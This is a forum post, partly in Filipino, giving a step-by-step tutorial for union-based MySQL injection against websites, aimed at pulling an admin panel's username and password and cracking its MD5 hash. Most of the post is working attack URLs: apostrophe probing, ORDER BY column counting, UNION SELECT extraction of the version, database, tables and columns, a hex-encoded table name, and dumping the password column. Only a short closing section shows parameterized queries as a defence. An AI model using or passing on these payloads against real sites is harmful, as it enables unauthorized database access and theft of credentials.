What's new

Closed [projectshield] basic mysql injection (for starters)

Status
Not open for further replies.

Ace Valentine

Honorary Poster
Joined
Jun 7, 2018
Posts
573
Reaction
169
Points
240
Today! Lets talk about SQL Injection. I suppose most of you are beginners to SQL Injection. So let's do a quick review to see what an SQL Injection really is.

What Is SQL Injection?

An SQL Injection, is basically a code injection that exploits the area vulnerable to SQL Injection. The injected code will be exploiting the Database, to get Information. Such as Emails, Usernames, Passwords, etc.
In this Tutorial, we'll be looking for the Admin Panel's credentials. Keep in mind, I said Admin Panel, not control panel. While performing an SQL Injection, you may not always find what you're looking for. Some sites have secured the important information, so that it will not be compromised so easily.

Exploiting the Database

Alright! Future h.a.c.k.e.r.s ready ready na ba kayo magSQL Injection? Okay, so first, we need to test our site to see if it's vulnerable to SQL Injection. Example:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=1

Our site HAS to have an '=' in it. Otherwise we cannot use SQL Injection to exploit the Database. So after the 1 (In the ID) put an '(apostrophe) so that it looks like this:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=1'

So if magEerror, wow! malaki ang chance na vulnerable ang site pero kung nagrefresh lang.. Magmove on ka na..

Finding the number of columns

Now, we know our site is vulnerable to SQL Injection, so we want to start getting the Info out of the Database. But before we do that, we have to find out WHICH columns are vulnerable to SQL Injection. But we don't know how many columns there are yet, so we need that first. To find the number of columns we need to use a command called 'Order By'. This command will help us determine how many columns there are. So your URL should now look like this

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 2--

Now if the site just refreshed to it's normal state, that's good. So we didn't get an error, so we have to continue until we get an error.

You do not have permission to view the full content of this post. Log in or register now. order by 3--
*NO ERROR*

You do not have permission to view the full content of this post. Log in or register now. order by 4--
*NO ERROR*

You do not have permission to view the full content of this post. Log in or register now. order by 5--
*ERROR*

Okay, we got an error on column 5. That means there are only 4 columns. Since the 5th column doesn't exist, we got an error.

URGENT
The two hyphen's (--) are critical for executing the command. The two hyphens will tell the site that it's a command, and will execute. So we NEED those at the end of every command.

Finding the vulnerable column

We now have the number of columns. But we just need to find out which one(s) are vulnerable to the execution of SQL commands. So we will use a command called "union select". This is what will find the vulnerable column(s). So we need to add that command into our URL. After that command, we need to add the number of columns there are. So now our URL should look like this:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,2,3,4--

A couple of number will appear on your screen. That is normal, and is a good sign. Those numbers, are the numbers of columns that are vulnerable to SQL Injection. So those are the columns we need to execute our commands in. So lets say that column 2 appeared on the Page. We will be executing commands in column 2.

URGENT
You HAVE to have the - after the =. That is critical.

Determining the Version of the MySQL Database

Why do we need the version you ask? Because the version will let us know what commands we can use. I consider version 5 easier. So I will tell you how to get information from the Database with version 5.

So our vulnerable column is 2. So that's where we'll be executing the code. Replace the 2 with your command. The command is: @@version. So your URL should now look like this:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,@@version,3,4--

Now it should display the Version on the page. It should look something like this:

Code:
5.1.47-community-log

The numbers don't matter, as long as they're at least 5, or over.

Finding the name of the Database

The name of the Database is important. At least if we want to look in the Tables which will contain the information. To find the name of the database, there are 2 most common ways. They both will work. The first command is:

Code:
http://hopefullyvulnerablesite/event.php?id=-1 union select 1,group_concat(schema_name),3,4 from information_schema.schema--

Sometimes, that command will show you more than the Database name. But all we want is the database name, so the better command would preferably be:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,concat(database()),3,4--

Now you will be showed the Database name. Congrats, look how far we are already. Now to the good stuff!

Viewing the Tables in the Database

The tables are what contains information. That's why we need to view them. So we can get the information we seek.

The command to view the tables is longer than the few we've seen already. So here's what your URL should now look like:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--

Hit enter, and the Tables in the Database will be displayed.

Viewing the Tables' information

We will most likely be given many tables. It is up to you to decide which one contains the valuable information.

So it can be at times difficult to choose a table that would contain important information. However, we will not always need the username, as it is most likely "admin". But the password, is what we REALLY need. So choose a table. The one I will use for this example will be "admin_credentials". It's very rare that you'll get a Table with a title basically making you choose that one. So this time use this query/command:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="admin_credentials"

For that query, you will almost ALWAYS get an error. So instead, convert the 'admin_credentials' to Hex.

To do that, I reccomend this site:
You do not have permission to view the full content of this post. Log in or register now.

Once you've converted your Table Name to Hex, you'll need to use the query again, but with Hex. So it should look like this:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x61646d696e5f63726564656e7469616c73

URGENT
You MUST have the 0x after the =. The 0x will let the site know that you are executing the command with HEX. So it's critical. Otherwise, it will NOT work.

Displaying the Contents

There will still be some tables inside the table you've chosen. So you need to get the information, and that will usually mean goodbye tables, and HELLO Admin Panel access.

Let's say that mine is displaying "userpword" and "user". Those are the only columns that are displaying for me (However, this will very rarely be the case). So we need to access the information in there. We can access them both at a time actually. But if you prefer one at a time, use this query:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(userpword),3,4 FROM DBName.admin_credentials--

Sometimes you will get a password that isn't readable meaning nyan ay nakaEncrypt/Hash ang password

C.r.a.c.k.i.n.g Hashes

What is a Hash you may be asking? A hash is basically an encrypted version of a Password, or any other "Hidden" information that can be used against the person, and/or site. People encrypt their passwords into a Hash, so that if there is a security breach, it will be hard to get the true password of the User, or Admin Panel.

There are many types of hashes, but the most popular to this day, is the MD5 hash. MD5 isn't an easy hash to decrypt, because you have to encrypt other passwords, and compare them to the Hash, there is no official way to decrypt them in any other way.

The best site you'll find on decrypting a Hash, would definitely be
Spoiler You do not have permission to view the full content of this post. Log in or register now.

How to Prevent Against It

Make it sure na yung code niyo na magfetch ng data from the database is not like this:

Code:
'select * from users where username=' & usernameInput & ' and password=' & passwordInput

you must use parameters:

Example in PHP

Code:
$username = 'gwapo'
$stmt = $dbConnection->prepare('SELECT * FROM users WHERE username= ?');
$stmt->bind_param('s', $username);

$stmt->execute();


Epilogue

So natagalan din ako sa pagCopy nito dun sa original source haha I hope that naintindihan niyo lahat kung paano gawin and idefend yung mga applications niyo sa ganitong attack.

Message nalang kayo dito if may questions kayo, tinatamad na akong magEdit haha

SQL Injection IS I.L.L.E.G.A.L. So whatever you do with it, is your responsibility, not mine. You can get in lots of trouble for an SQL Injection.

You want more adventures? Follow me!

Good luck! And have fun securing your codes!
 
Last edited:
Status
Not open for further replies.
Back
Top